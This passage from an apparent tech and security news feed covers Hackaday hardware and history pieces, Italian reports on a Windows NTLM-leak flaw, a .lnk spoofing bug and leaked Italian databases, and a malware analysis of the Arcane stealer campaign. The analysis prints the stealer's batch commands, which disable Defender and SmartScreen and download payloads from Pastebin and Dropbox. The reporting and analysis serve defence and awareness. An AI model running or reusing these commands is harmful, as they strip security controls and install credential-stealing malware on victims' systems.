The idea is broadly the same as the original, and remains compatible with software from back in the day. New are some extra sensors, longer battery life, and an nRF52840 BLE microcontroller running the show. It certainly captures the original well, however we’re left wondering whether a 2013 experience still cuts it in 2025 at that price. We suspect in that vein it would be the ideal compliment to your game controller when playing Grand Theft Auto V, another evergreen 2013 hit.
We look forward to seeing where this goes, and we reported on the OS becoming open source earlier this year. Perhaps someone might produce a piece of open source hardware to do the same job?
Modern Computing’s Roots or The Manchester Baby
In the heart of Manchester, UK, a groundbreaking event took place in 1948: the first modern computer, known as the Manchester Baby, ran its very first program. The Baby’s ability to execute stored programs, developed with guidance from John von Neumann’s theory, marks it as a pioneer in the digital age. This fascinating chapter in computing history not only reshapes our understanding of technology’s roots but also highlights the incredible minds behind it. The original article, including a video transcript, sits here at [TheChipletter]’s.
So, what made this hack so special? The Manchester Baby, though a relatively simple prototype, was the first fully electronic computer to successfully run a program from memory. Built by a team with little formal experience in computing, the Baby featured a unique cathode-ray tube (CRT) as its memory store – a bold step towards modern computing. It didn’t just run numbers; it laid the foundation for all future machines that would use memory to store both data and instructions. Running a test to find the highest factor of a number, the Baby performed 3.5 million operations over 52 minutes. Impressive, by that time.
Despite criticisms that it was just a toy computer, the Baby’s significance shines through. It was more than just a prototype; it was proof of concept for the von Neumann architecture, showing us that computers could be more than complex calculators. While debates continue about whether it or the ENIAC should be considered the first true stored-program computer, the Baby’s role in the evolution of computing can’t be overlooked.
youtube.com/embed/cozcXiSSkwE?…
This M5Stack Game Is Surprisingly Addictive
For those of us lucky enough to have been at Hackaday Europe in Berlin, there was a feast of hacks at our disposal. Among them was [Vladimir Divic]’s gradients game, software for an M5Stack module which was definitely a lot of fun to play. The idea of the game is simple enough, a procedurally generated contour map is displayed on the screen, and the player must navigate a red ball around and collect as many green ones as possible. It’s navigated using the M5Stack’s accelerometer, which is what makes for the engaging gameplay. In particular it takes a moment to discover that the ball can be given momentum, making it something more than a simple case of ball-rolling.
Underneath the hood it’s an Arduino .ino file for the M5Stack’s ESP32, and thus shouldn’t present a particular challenge to most readers. Meanwhile the M5Stack with its versatile range of peripherals has made it onto these pages several times over the years, not least as a LoRA gateway.
FLOSS Weekly Episode 825: Open Source CI With Semaphore
This week, Jonathan Bennett and Ben Meadors talk to Darko Fabijan about Semaphore, the newly Open Sourced Continuous Integration solution! Why go Open, and how has it gone so far? Watch to find out!
- Semaphore Uncut Podcast: semaphore.io/podcast
- Discord: discord.gg/FBuUrV24NH
- youtube.com/c/SemaphoreCI
- Semaphore blog: semaphoreci.com/blog
- Semaphore on X: x.com/semaphoreci
youtube.com/embed/0Ts8sbV6K7A?…
Did you know you can watch the live recording of the show right on our YouTube Channel? Have someone you’d like us to interview? Let us know, or contact the guest and have them contact us! Take a look at the schedule here.
play.libsyn.com/embed/episode/…
Direct Download in DRM-free MP3.
If you’d rather read along, here’s the transcript for this week’s episode.
Places to follow the FLOSS Weekly Podcast:
Theme music: “Newer Wave” Kevin MacLeod (incompetech.com)
Licensed under Creative Commons: By Attribution 4.0 License
hackaday.com/2025/03/19/floss-…
From the Ashes: Coal Ash May Offer Rich Source of Rare Earth Elements
For most of history, the world got along fine without the rare earth elements. We knew they existed, we knew they weren’t really all that rare, and we really didn’t have much use for them — until we discovered just how useful they are and made ourselves absolutely dependent on them, to the point where not having them would literally grind the world to a halt.
This dependency has spurred a search for caches of rare earth elements in the strangest of places, from muddy sediments on the sea floor to asteroids. But there’s one potential source that’s much closer to home: coal ash waste. According to a study from the University of Texas Austin, the 5 gigatonnes of coal ash produced in the United States between 1950 and 2021 might contain as much as $8.4 billion worth of REEYSc — that’s the 16 lanthanide rare earth elements plus yttrium and scandium, transition metals that aren’t strictly rare earths but are geologically associated with them and useful in many of the same ways.
The study finds that about 70% of this coal ash largesse could still be accessible in the landfills and ponds in which it was dumped after being used for electrical generation or other industrial processes; the remainder is locked away in materials like asphalt and concrete, where it was used as a filler. The concentration of REEYSc in ash waste depends on where the coal was mined and ranges from 264 mg/kg for Powder River coal to 431 mg/kg for coal from the Appalachian Basin. Oddly, they find that recovery rates are inversely proportional to the richness of the ash.
The study doesn’t discuss any specific methods for recovery of REEYSc from coal ash at the industrial scale, but it does reference an earlier paper that mentions possible methods we’ve seen before in our Mining and Refining series, including physical beneficiation, which separates the desired minerals from the waste material using properties such as shape, size, or density, and hydrometallurgical methods such as acid leaching or ion exchange. The paper also doesn’t mention how these elements accumulated in the coal ash in the first place, although we assume that Carboniferous-period plants bioaccumulated the minerals before they died and started turning into coal.
Of course, this is just preliminary research, and no attempt has yet been made to commercialize rare earth extraction from coal ash. There are probably serious technical and regulatory hurdles, not least of which would be valid concerns for the environmental impacts of disturbing long-ignored ash piles. On the other hand, the study mentions “mine-mouth” power plants, where mines and generating plants were colocated as possibly the ideal place to exploit since ash was used to backfill the mine works right on the same site.
Falla critica in Esplora file di Windows ruba le password senza interazione dell’utente
Si tratta di un grave bug risolto da Microsoft nel patch tuesday di Marzo che ha visto pubblicato un exploit proof-of-concept (PoC) che dimostra come questa falla di sicurezza può essere sfruttata.
La vulnerabilità è presente in Esplora file di Windows, ed è identificata come CVE-2025-24071, consente agli aggressori di rubare password con hash NTLM senza alcuna interazione da parte dell’utente, se non la semplice estrazione di un file compresso.
La vulnerabilità consente l’esposizione di informazioni sensibili ad attori non autorizzati, consentendo attacchi di spoofing di rete. Un ricercatore di sicurezza con handle 0x6rss ha pubblicato un exploit proof-of-concept su GitHub il 16 marzo 2025. Il PoC include uno script Python che genera il file .library-ms dannoso e può essere utilizzato con un semplice comando: python poc.py
Scopriamo come funziona questo grave bug di sicurezza
La vulnerabilità, denominata “NTLM Hash Leak tramite estrazione RAR/ZIP”, sfrutta il meccanismo di elaborazione automatica dei file di Windows Explorer. Quando un file .library-ms appositamente creato contenente un percorso SMB dannoso viene estratto da un archivio compresso, Windows Explorer ne analizza automaticamente il contenuto per generare anteprime e metadati di indicizzazione.
Questa elaborazione automatica avviene anche se l’utente non apre mai esplicitamente il file estratto. Il formato file .library-ms, basato su XML è considerato affidabile da Windows Explorer. Deinisce le posizioni delle librerie, include un tag che punta a un server SMB controllato dall’aggressore, afferma il ricercatore di sicurezza “0x6rss”.
Durante l’estrazione, Windows Explorer tenta di risolvere automaticamente il percorso SMB incorporato (ad esempio, \\192.168.1.116\shared) per raccogliere i metadati. Questa azione innesca un handshake di autenticazione NTLM dal sistema della vittima al server dell’aggressore, facendo trapelare l’hash NTLMv2 della vittima senza alcuna interazione da parte dell’utente.
Utilizzando Procmon, possiamo osservare chiaramente che subito dopo l’estrazione del file .library-ms , le seguenti operazioni vengono eseguite automaticamente da Explorer.exe e dai servizi di indicizzazione come SearchProtocolHost.exe :
- CreateFile: il file viene aperto automaticamente da Explorer.
- ReadFile: il contenuto del file viene letto per estrarre i metadati.
- QueryBasicInformationFile: query sui metadati eseguite.
- CloseFile: il file viene chiuso dopo l’elaborazione.
Inoltre, SearchProtocolHost.exe viene richiamato come parte del servizio di indicizzazione dei file di Windows. Dopo che Explorer.exe termina la sua elaborazione iniziale, il servizio di indicizzazione riapre e legge il file per indicizzarne il contenuto. Ciò conferma ulteriormente la gestione automatizzata dei file al momento dell’estrazione:
- CreateFile, ReadFile, QueryBasicInformationFile, CloseFile: eseguiti da SearchProtocolHost.exe per aggiungere il contenuto del file all’indice di ricerca.
Queste azioni dimostrano in modo conclusivo che Windows elabora automaticamente i file immediatamente dopo l’estrazione, senza alcuna interazione esplicita da parte dell’utente.
Sia Explorer.exe che SearchProtocolHost.exe leggono ed elaborano automaticamente il contenuto XML del file .library-ms , avviando un tentativo di connessione al percorso SMB incorporato al suo interno.
Sfruttamento della vulnerabilità nei mercati underground
Questa vulnerabilità è attivamente sfruttata dagli attaccanti ed è stata potenzialmente messa in vendita sul forum xss.is dall’autore della minaccia noto come “Krypt0n“. Questo Threat Actors è anche lo sviluppatore del malware denominato “EncryptHub Stealer“
L'articolo Falla critica in Esplora file di Windows ruba le password senza interazione dell’utente proviene da il blog della sicurezza informatica.
Reviving a Maplin 4600 DIY Synthesizer From the 1970s
A piece of musical history is the Maplin 4600, a DIY electronic music synthesizer from the 1970s. The design was published in an Australian electronics magazine and sold as a DIY kit, and [LOOK MUM NO COMPUTER] got his hands on an original Maplin 4600 that he refurbishes and puts through its paces.
The Maplin 4600 is a (mostly) analog device with a slightly intimidating-looking layout. It features multiple oscillators, mixers, envelope generators, filters, and a complex-looking patch bay on the right hand side that is reminiscent of a breadboard. By inserting conductive pins, one can make connections between various inputs and outputs.
Internally the different features and circuits are mostly unconnected from one another by default, so the patch board is how the instrument is “programmed” and the connections made can be quite complex. The 4600 is one of a few synthesizer designs by [Trevor Marshall], who has some additional details about on his website.
The video (embedded below) is a complete walk-through of the unit, including its history, quirks, and design features. If you’d like to skip directly to a hands-on demonstrating how it works, that begins around the 10:15 mark.
Synthesizers have a rich DIY history and it’s fascinating to see an in-depth look at this one. And hey, if you like your synths complex and intimidating, do yourself a favor and check out the Starship One.
youtube.com/embed/S-tnRJZBEUk?…
Italia col Botto! Esposti 35 database italiani nell’underground. tra questi anche Giustizia.it
Un recente post apparso sul noto forum underground BreachForums ha rivelato la pubblicazione di un pacchetto contenente 35 database italiani, esponendo informazioni sensibili di utenti e aziende. L’utente “Tanaka”, moderatore della piattaforma, ha condiviso una lista di archivi contenenti dati in formato SQL e CSV, suggerendo la possibile compromissione di diverse realtà, tra cui aziende private e persino entità istituzionali.
Disclaimer: Questo rapporto include screenshot e/o testo tratti da fonti pubblicamente accessibili. Le informazioni fornite hanno esclusivamente finalità di intelligence sulle minacce e di sensibilizzazione sui rischi di cybersecurity. Red Hot Cyber condanna qualsiasi accesso non autorizzato, diffusione impropria o utilizzo illecito di tali dati. Al momento, non è possibile verificare in modo indipendente l’autenticità delle informazioni riportate, poiché le organizzazioni coinvolte non hanno ancora rilasciato un comunicato ufficiale sul proprio sito web. Di conseguenza, questo articolo deve essere considerato esclusivamente a scopo informativo e di intelligence.
Tra le vittime anche siti istituzionali
Uno degli elementi più allarmanti di questa fuga di dati è la presenza nella lista del sito “giustizia.it”, portale istituzionale legato all’amministrazione della giustizia italiana. Se confermata, questa violazione potrebbe avere gravi implicazioni per la sicurezza dei dati giudiziari e delle persone coinvolte.
Oltre a questo, nell’elenco compaiono diverse aziende operanti in vari settori, tra cui il commercio online, il settore immobiliare e la tecnologia. Alcuni file fanno riferimento a database contenenti centinaia di migliaia di utenti, con informazioni che potrebbero includere credenziali di accesso, dati personali e altre informazioni sensibili.
L’importanza di un’analisi mirata
È altamente probabile che questi database siano il risultato di vecchie violazioni, riorganizzati e rivenduti nel mercato underground sotto forma di “collection” di credenziali. Questo fenomeno è comune nel dark web, dove gli attori malevoli combinano dati trapelati nel tempo per creare nuovi “combo list” utilizzabili per attacchi mirati.
Anche se alcune credenziali possono sembrare obsolete, è fondamentale prestare attenzione: molte di esse rimangono valide o vengono riutilizzate dagli utenti su più servizi. La diffusione di queste raccolte può infatti alimentare una nuova ondata di phishing e attacchi credential stuffing, aumentando il rischio per aziende e privati.
Le aziende e le entità citate nel post dovrebbero prendere immediati provvedimenti per verificare l’origine di questi database e comprendere se siano realmente frutto di una violazione diretta o se, invece, derivino da una compromissione indiretta di fornitori terzi o servizi connessi.
Se non hanno evidenza di una precedente intrusione, dovrebbero comunque effettuare un’indagine approfondita per escludere la possibilità di un data breach non ancora identificato. Un monitoraggio continuo e l’adozione di strategie di mitigazione del rischio sono fondamentali per proteggere i dati degli utenti e preservare la propria reputazione.
Un mercato sempre più attivo dei dati trafugati
Il forum BreachForums si è ormai affermato come uno dei principali hub per la vendita e la condivisione di database compromessi. Dopo la chiusura di RaidForums, piattaforma simile, BreachForums è rapidamente diventato il punto di riferimento per i cybercriminali interessati alla compravendita di dati sensibili.
Questa ennesima esposizione di dati italiani sottolinea ancora una volta l’importanza di misure di sicurezza adeguate, aggiornamenti tempestivi dei sistemi e una formazione continua sulla cybersecurity per prevenire future compromissioni.
Cosa fare se si è coinvolti? Le aziende e gli enti presenti nell’elenco dovrebbero:
- Verificare la legittimità della presunta violazione.
- Condurre un audit di sicurezza per individuare eventuali falle nei sistemi.
- Forzare il reset delle credenziali per gli utenti coinvolti.
- Monitorare il dark web per intercettare eventuali tentativi di vendita o abuso dei dati esposti.
In un contesto in cui le fughe di dati sono sempre più frequenti, la prevenzione e la reazione tempestiva restano le migliori strategie di difesa.
L'articolo Italia col Botto! Esposti 35 database italiani nell’underground. tra questi anche Giustizia.it proviene da il blog della sicurezza informatica.
So What is a Supercomputer Anyway?
Over the decades there have been many denominations coined to classify computer systems, usually when they got used in different fields or technological improvements caused significant shifts. While the very first electronic computers were very limited and often not programmable, they would soon morph into something that we’d recognize today as a computer, starting with World War 2’s Colossus and ENIAC, which saw use with cryptanalysis and military weapons programs, respectively.
The first commercial digital electronic computer wouldn’t appear until 1951, however, in the form of the Ferranti Mark 1. These 4.5 ton systems mostly found their way to universities and kin, where they’d find welcome use in engineering, architecture and scientific calculations. This became the focus of new computer systems, effectively the equivalent of a scientific calculator. Until the invention of the transistor, the idea of a computer being anything but a hulking, room-sized monstrosity was preposterous.
A few decades later, more computer power could be crammed into less space than ever before including ever higher density storage. Computers were even found in toys, and amidst a whirlwind of mini-, micro-, super-, home-, minisuper- and mainframe computer systems, one could be excused for asking the question: what even is a supercomputer?
Today’s Supercomputers
Perhaps a fair way to classify supercomputers is that the ‘supercomputer’ aspect is a highly time-limited property. During the 1940s, Colossus and ENIAC were without question the supercomputers of their era, while 1976’s Cray-1 wiped the floor with everything that came before, yet all of these are archaic curiosities next to today’s top two supercomputers. Both the El Capitan and Frontier supercomputers are exascale (1+ exaFLOPS in double precision IEEE 754 calculations) level machines, based around commodity x86_64 CPUs in a massively parallel configuration.
Taking up 700 m2 of floor space at the Lawrence Livermore National Laboratory (LLNL) and drawing 30 MW of power, El Capitan’s 43,808 AMD EPYC CPUs are paired with the same number of AMD Instinct MI300A accelerators, each containing 24 Zen 4 cores plus CDNA3 GPU and 128 GB of HBM3 RAM. Unlike the monolithic ENIAC, El Capitan’s 11,136 nodes, containing four MI300As each, rely on a number of high-speed interconnects to distribute computing work across all cores.
At LLNL, El Capitan is used for effectively the same top secret government things as ENIAC was, while Frontier at Oak Ridge National Laboratory (ORNL) was the fastest supercomputer before El Capitan came online about three years later. Although currently LLNL and ORNL have the fastest supercomputers, there are many more of these systems in use around the world, even for innocent scientific research.
Looking at the current list of supercomputers, such as today’s Top 9, it’s clear that not only can supercomputers perform a lot more operations per second, they also are invariably massively parallel computing clusters. This wasn’t a change that was made easily, as parallel computing comes with a whole stack of complications and problems.
The Parallel Computing Shift
The first massively parallel computer was the ILLIAC IV, conceptualized by Daniel Slotnick in 1952 and first successfully put into operation in 1975 when it was connected to ARPANET. Although only one quadrant was fully constructed, it produced 50 MFLOPS compared to the Cray-1’s 160 MFLOPS a year later. Despite the immense construction costs and spotty operational history, it provided a most useful testbed for developing parallel computation methods and algorithms until the system was decommissioned in 1981.
There was a lot of pushback against the idea of massively parallel computation, however, with Seymour Cray famously comparing the idea of using many parallel vector processors instead of a single large one akin to ‘plowing a field with 1024 chickens instead of two oxen’.
Ultimately there is only so far you can scale a singular vector processor, of course, while parallel computing promised much better scaling, as well as the use of commodity hardware. A good example of this is a so-called Beowulf cluster, named after the original 1994 parallel computer built by Thomas Sterling and Donald Becker at NASA. This can use plain desktop computers, wired together using for example Ethernet and with open source libraries like Open MPI enabling massively parallel computing without a lot of effort.
Not only does this approach enable the assembly of a ‘supercomputer’ using cheap-ish, off-the-shelf components, it’s also effectively the approach used for LLNL’s El Capitan, just with not very cheap hardware, and not very cheap interconnect hardware, but still cheaper than if one were to try to build a monolithic vector processor with the same raw processing power after taking the messaging overhead of a cluster into account.
Mini And Maxi
One way to look at supercomputers is that it’s not about the scale, but what you do with it. Much like how government, large businesses and universities would end up with ‘Big Iron’ in the form of mainframes and supercomputers, there was a big market for minicomputers too. Here ‘mini’ meant something like a PDP-11 that’d comfortably fit in the corner of an average room at an office or university.
The high-end versions of minicomputers were called ‘superminicomputer‘, which is not to be confused with minisupercomputer, which is another class entirely. During the 1980s there was a brief surge in this latter class of supercomputers that were designed to bring solid vector computing and similar supercomputer feats down to a size and price tag that might entice departments and other customers who’d otherwise not even begin to consider such an investment.
The manufacturers of these ‘budget-sized supercomputers’ were generally not the typical big computer manufacturers, but instead smaller companies and start-ups like Floating Point Systems (later acquired by Cray) who sold array processors and similar parallel, vector computing hardware.
Recently David Lovett (AKA Mr. Usagi Electric) embarked on a quest to recover and reverse-engineer as much FPS hardware as possible, with one of the goals being to build a full minisupercomputer system as companies and universities might have used them in the 1980s. This would involve attaching such an array processor to a PDP-11/44 system.
Speed Versus Reliability
Amidst all of these definitions, the distinction between a mainframe and a supercomputer is much easier and more straightforward at least. A mainframe is a computer system that’s designed for bulk data processing with as much built-in reliability and redundancy as the price tag allows for. A modern example is IBM’s Z-series of mainframes, with the ‘Z’ standing for ‘zero downtime’. These kind of systems are used by financial institutions and anywhere else where downtime is counted in millions of dollars going up in (literal) flames every second.
This means hot-swappable processor modules, hot-swappable and redundant power supplies, not to mention hot spares and a strong focus on fault tolerant computing. All of these features are less relevant for a supercomputer, where raw performance is the defining factor when running days-long simulations and when other ways to detect flaws exist without requiring hardware-level redundancy.
Considering the brief lifespan of supercomputers (currently in the order of a few years) compared to mainframes (decades) and the many years that the microcomputers which we have on our desks can last, the life of a supercomputer seems like that of a bright and very brief flame, indeed.
Top image: Marlyn Wescoff and Betty Jean Jennings configuring plugboards on the ENIAC computer (Source: US National Archives)
Make Fancy Resin Printer 3D Models FDM-Friendly
Do you like high-detail 3D models intended for resin printing, but wish you could more easily print them on a filament-based FDM printer? Good news, because [Jacob] of Painted4Combat shared a tool he created to make 3D models meant for resin printers — the kind popular with tabletop gamers — easier to port to FDM. It comes in the form of a Blender add-on called Resin2FDM. Intrigued, but wary of your own lack of experience with Blender? No problem, because he also made a video that walks you through the whole thing step-by-step.
3D models intended for resin printing aren’t actually any different, format-wise, from models intended for FDM printers. The differences all come down to the features of the model and how well the printer can execute them. Resin printing is very different from FDM, so printing a model on the “wrong” type of printer will often have disappointing results. Let’s look at why that is, to better understand what makes [Jacob]’s tool so useful.
Rafts and a forest of thin tree-like supports are common in resin printing. In the tabletop gaming scene, many models come pre-supported for convenience. A fair bit of work goes into optimizing the orientation of everything for best printed results, but the benefits don’t carry directly over to FDM.
For one thing, supports for resin prints are usually too small for an FDM printer to properly execute — they tend to be very thin and very tall, which is probably the least favorable shape for FDM printing. In addition, contact points where each support tapers down to a small point that connects to the model are especially troublesome; FDM slicer software will often simply consider those features too small to bother trying to print. Supports that work on a resin printer tend to be too small or too weak to be effective on FDM, even with a 0.2 mm nozzle.
To solve this, [Jacob]’s tool allows one to separate the model itself from the support structure. Once that is done, the tool further allows one to tweak the nest of supports, thickening them up just enough to successfully print on an FDM printer, while leaving the main model unchanged. The result is a support structure that prints well via FDM, allowing the model itself to come out nicely, with a minimum of alterations to the original.
Resin2FDM is available in two versions, the Lite version is free and an advanced version with more features is available to [Jacob]’s Patreon subscribers. The video (embedded below) covers everything from installation to use, and includes some general tips for best results. Check it out if you’re interested in how [Jacob] solved this problem, and keep it in mind for the next time you run across a pre-supported model intended for resin printing that you wish you could print with FDM.
youtube.com/embed/zZp-CLhH1Ao?…
Arcane stealer: We want all your data
At the end of 2024, we discovered a new stealer distributed via YouTube videos promoting game cheats. What’s intriguing about this malware is how much it collects. It grabs account information from VPN and gaming clients, and all kinds of network utilities like ngrok, Playit, Cyberduck, FileZilla and DynDNS. The stealer was named Arcane, not to be confused with the well-known Arcane Stealer V. The malicious actor behind Arcane went on to release a similarly named loader, which supposedly downloads cheats and cracks, but in reality delivers malware to the victim’s device.
Distribution
The campaign in which we discovered the new stealer was already active before Arcane appeared. The original distribution method started with YouTube videos promoting game cheats. The videos were frequently accompanied by a link to an archive and a password to unlock it. Upon unpacking the archive, the user would invariably discover a start.bat batch file in the root folder and the UnRAR.exe utility in one of the subfolders.
Archive root
Contents of the “natives” subfolder
The contents of the batch file were obfuscated. Its only purpose was to download another password-protected archive via PowerShell, and unpack that with UnRAR.exe with the password embedded in the BATCH file as an argument.
Contents of the obfuscated start.bat file
Following that, start.bat would use PowerShell to launch the executable files from the archive. While doing so, it added every drive root folder to SmartScreen filter exceptions. It then reset the EnableWebContentEvaluation and SmartScreenEnabled registry keys via the system console utility reg.exe to disable SmartScreen altogether.
powershell -Command "Get-PSDrive -PSProvider FileSystem | ForEach-Object {Add-MpPreference -ExclusionPath $_.Root}"
reg add "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\AppHost" /v "EnableWebContentEvaluation" /t REG_DWORD /d 0 /f
reg add "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer" /v "SmartScreenEnabled" /t REG_SZ /d "Off" /f
powershell -Command "(New-Object Net.WebClient).DownloadString(\'https://pastebin.com/raw/<redacted>\')"
powershell -Command "(New-Object Net.WebClient).DownloadFile(\'https://www.dropbox.com/scl/fi/<redacted>/black.rar?rlkey=<redacted>&st=<redacted>&dl=1\', \'C:\\Users\\<redacted>\\AppData\\Local\\Temp\\black.rar\')"
Key commands run by start.bat
The archive would always contain two executables: a miner and a stealer.
Contents of the downloaded archive
The stealer was a Phemedrone Trojan variant, rebranded by the attackers as “VGS”. They used this name in the logo, which, when generating stealer activity reports, is written to the beginning of the file along with the date and time of the report’s creation.
Phemedrone and VGS logos
Original distribution scheme
Arcane replaces VGS
At the end of 2024, we discovered a new Arcane stealer distributed as part of the same campaign. It is worth noting that a stealer with a similar name has been encountered before: a Trojan named “Arcane Stealer V” was offered on the dark web in 2019, but it shares little with our find. The new stealer takes its name from the ASCII art in the code.
Arcane logo
Arcane succeeded VGS in November. Although much of it was borrowed from other stealers, we could not attribute it to any of the known families.
Arcane gets regular updates, so its code and capabilities change from version to version. We will describe the common functionality present in various modifications and builds. In addition to logins, passwords, credit card data, tokens and other credentials from various Chromium and Gecko-based browsers, Arcane steals configuration files, settings and account information from the following applications:
- VPN clients: OpenVPN, Mullvad, NordVPN, IPVanish, Surfshark, Proton, hidemy.name, PIA, CyberGhost, ExpressVPN
- Network clients and utilities: ngrok, Playit, Cyberduck, FileZilla, DynDNS
- Messaging apps: ICQ, Tox, Skype, Pidgin, Signal, Element, Discord, Telegram, Jabber, Viber
- Email clients: Outlook
- Gaming clients and services: Riot Client, Epic, Steam, Ubisoft Connect (ex-Uplay), Roblox, Battle.net, various Minecraft clients
- Crypto wallets: Zcash, Armory, Bytecoin, Jaxx, Exodus, Ethereum, Electrum, Atomic, Guarda, Coinomi
In addition, the stealer collects all kinds of system information, such as the OS version and installation date, digital key for system activation and license verification, username and computer name, location, information about the CPU, memory, graphics card, drives, network and USB devices, and installed antimalware and browsers. Arcane also takes screenshots of the infected device, obtains lists of running processes and Wi-Fi networks saved in the OS, and retrieves the passwords for those networks.
Arcane’s functionality for stealing data from browsers warrants special attention. Most browsers generate unique keys for encrypting sensitive data they store, such as logins, passwords, cookies, etc. Arcane uses the Data Protection API (DPAPI) to obtain these keys, which is typical of stealers. But Arcane also contains an executable file of the Xaitax utility, which it uses to crack browser keys. To do this, the utility is dropped to disk and launched covertly, and the stealer obtains all the keys it needs from its console output.
The stealer implements an additional method for extracting cookies from Chromium-based browsers through a debug port. The Trojan secretly launches a copy of the browser with the “remote-debugging-port” argument, then connects to the debug port, issues commands to visit several sites, and requests their cookies. The list of resources it visits is provided below.
- gmail.com,
- drive.google.com,
- photos.google.com,
- mail.ru,
- rambler.ru,
- steamcommunity.com,
- youtube.com,
- avito.ru,
- ozon.ru,
- twitter.com,
- roblox.com,
- passport.yandex.ru
ArcanaLoader
Within a few months of discovering the stealer, we noticed a new distribution pattern. Rather than promoting cheats, the threat actors shifted to advertising ArcanaLoader on their YouTube channels. This is a loader with a graphical user interface for downloading and running the most popular cracks, cheats and other similar software. More often than not, the links in the videos led to an executable file that downloaded an archive with ArcanaLoader.
ArcanaLoader
See translation
| Читы | Cheats |
| Настройки | Settings |
| Клиенты с читами | Clients with cheats |
| Все версии | All versions |
| Введите название чита | Enter cheat name |
| Версия: 1.16.5 | Version: 1.16.5 |
| Запустить | Start |
| Версия: Все Версии | Version: All versions |
The loader itself included a link to the developers’ Discord server, which featured channels for news, support and links to download new versions.
Discord server invitation
See translation
You have been invited to Arcana Loader
548 online
3,156 users
Accept invitation
At the same time, one of the Discord channels posted an ad, looking for bloggers to promote ArcanaLoader.
Looking for bloggers to spread the loader
See translation
ArcanaLoader BOT
Form:
1. Total subscribers
2. Average views per week
3. Link to ArcanaLoader video
4. Screenshot proof of channel ownership
YOUTUBE
Criteria:
1. 600* subscribers
2. 1,500+ views
3. Links to 2 Arcana Loader videos
Permissions:
1. Send your videos to the #MEDIA chat
2. Personal server role
3. Add cheat to loader without delay
4. Access to @everyone in the #MEDIA chat
5. Possible compensation in rubles for high traffic
MEDIA
Criteria:
1. 50+ subscribers
2. 150+ views
3. Link to 1 ArcanaLoader video
Permissions:
1. Send your videos to the #MEDIA chat
2. Personal server role
Sadly, the main ArcanaLoader executable contained the aforementioned Arcane stealer.
Victims
All conversations on the Discord server are in Russian, the language used in the news channels and YouTube videos. Apparently, the attackers target a Russian-speaking audience. Our telemetry confirms this assumption: most of the attacked users were in Russia, Belarus and Kazakhstan.
Takeaways
Attackers have been using cheats and cracks as a popular trick to spread all sorts of malware for years, and they’ll probably keep doing so. What’s interesting about this particular campaign is that it illustrates how flexible cybercriminals are, always updating their tools and the methods of distributing them. Besides, the Arcane stealer itself is fascinating because of all the different data it collects and the tricks it uses to extract the information the attackers want. To stay safe from these threats, we suggest being wary of ads for shady software like cheats and cracks, avoiding links from unfamiliar bloggers, and using strong security software to detect and disarm rapidly evolving malware.
“Glasses” That Transcribe Text To Audio
Glasses for the blind might sound like an odd idea, given the traditional purpose of glasses and the issue of vision impairment. However, eighth-grade student [Akhil Nagori] built these glasses with an alternate purpose in mind. They’re not really for seeing. Instead, they’re outfitted with hardware to capture text and read it aloud.
Yes, we’re talking about real-time text-to-audio transcription, built into a head-worn format. The hardware is pretty straightforward: a Raspberry Pi Zero 2W runs off a battery and is outfitted with the usual first-party camera. The camera is mounted on a set of eyeglass frames so that it points at whatever the wearer might be “looking” at. At the push of a button, the camera captures an image, and then passes it to an API which does the optical character recognition. The text can then be passed to a speech synthesizer so it can be read aloud to the wearer.
It’s funny to think about how advanced this project really is. Jump back to the dawn of the microcomputer era, and such a device would have been a total flight of fancy—something a researcher might make a PhD and career out of. Indeed, OCR and speech synthesis alone were challenge enough. Today, you can stand on the shoulders of giants and include such mighty capability in a homebrewed device that cost less than $50 to assemble. It’s a neat project, too, and one that we’re sure taught [Akhil] many valuable skills along the way.
youtube.com/embed/ApshHWClGoI?…
8 Anni di Sfruttamento! Il Bug 0day su Microsoft Windows Che Ha Alimentato 11 Gruppi APT
Il team di threat hunting di Trend Zero Day Initiative™ (ZDI) ha identificato casi significativi di sfruttamento di un bug di sicurezza in una serie di campagne risalenti al 2017. L’analisi ha rivelato che 11 gruppi sponsorizzati da stati provenienti da Corea del Nord, Iran, Russia e Cina hanno impiegato il bug monitorato con il codice ZDI-CAN-25373 in operazioni motivate principalmente da cyber spionaggio e furto di dati.
Trendmicro ha scoperto quasi mille campioni Shell Link (.lnk) che sfruttano ZDI-CAN-25373; tuttavia, è probabile che il numero totale di tentativi di sfruttamento sia molto più alto. Successivamente, i ricercatori hanno inviato un exploit proof-of-concept tramite il programma bug bounty di Trend ZDI a Microsoft, che ha rifiutato di risolvere questa vulnerabilità con una patch di sicurezza.
La vulnerabilità, identificata come ZDI-CAN-25373, consente agli aggressori di eseguire comandi dannosi nascosti sui computer delle vittime sfruttando file di collegamento di Windows (.lnk) appositamente creati. Questa falla di sicurezza influisce sul modo in cui Windows visualizza il contenuto dei file di collegamento tramite la sua interfaccia utente. Quando gli utenti esaminano un file .lnk compromesso, Windows non riesce a visualizzare i comandi dannosi nascosti al suo interno, nascondendo di fatto il vero pericolo del file.
Ad oggi sono stati scoperti quasi 1.000 artefatti del file .LNK che sfruttano ZDI-CAN-25373, la maggior parte dei quali è collegata a Evil Corp (Water Asena), Kimsuky (Earth Kumiho), Konni (Earth Imp), Bitter (Earth Anansi) e ScarCruft (Earth Manticore).
Degli 11 attori di minacce sponsorizzati dallo stato che sono stati scoperti ad abusare della falla, quasi la metà di loro proviene dalla Corea del Nord. Oltre a sfruttare la falla in vari momenti, la scoperta serve come indicazione di collaborazione incrociata tra i diversi cluster di minacce che operano all’interno dell’apparato informatico di Pyongyang.
Nello specifico, il bug comporta l’aggiunta degli argomenti con i caratteri di spazio (0x20), tabulazione orizzontale (0x09), avanzamento riga (0x0A), tabulazione verticale (\x0B), avanzamento pagina (\x0C) e ritorno a capo (0x0D) per eludere il rilevamento.
I dati di telemetria indicano che governi, enti privati, organizzazioni finanziarie, think tank, fornitori di servizi di telecomunicazione e agenzie militari/difesa situate negli Stati Uniti, in Canada, Russia, Corea del Sud, Vietnam e Brasile sono diventati i principali obiettivi degli attacchi che sfruttano questa vulnerabilità.
Negli attacchi analizzati da ZDI, i file .LNK fungono da veicolo di distribuzione per famiglie di malware note come Lumma Stealer, GuLoader e Remcos RAT, tra gli altri. Tra queste campagne, degna di nota è lo sfruttamento di ZDI-CAN-25373 da parte di Evil Corp.
Vale la pena notare che .LNK è tra le estensioni di file pericolose bloccate nei prodotti microsoft come Outlook, Word, Excel, PowerPoint e OneNote. Di conseguenza, il tentativo di aprire tali file scaricati dal Web avvia automaticamente un avviso di sicurezza che consiglia agli utenti di non aprire file da fonti sconosciute.
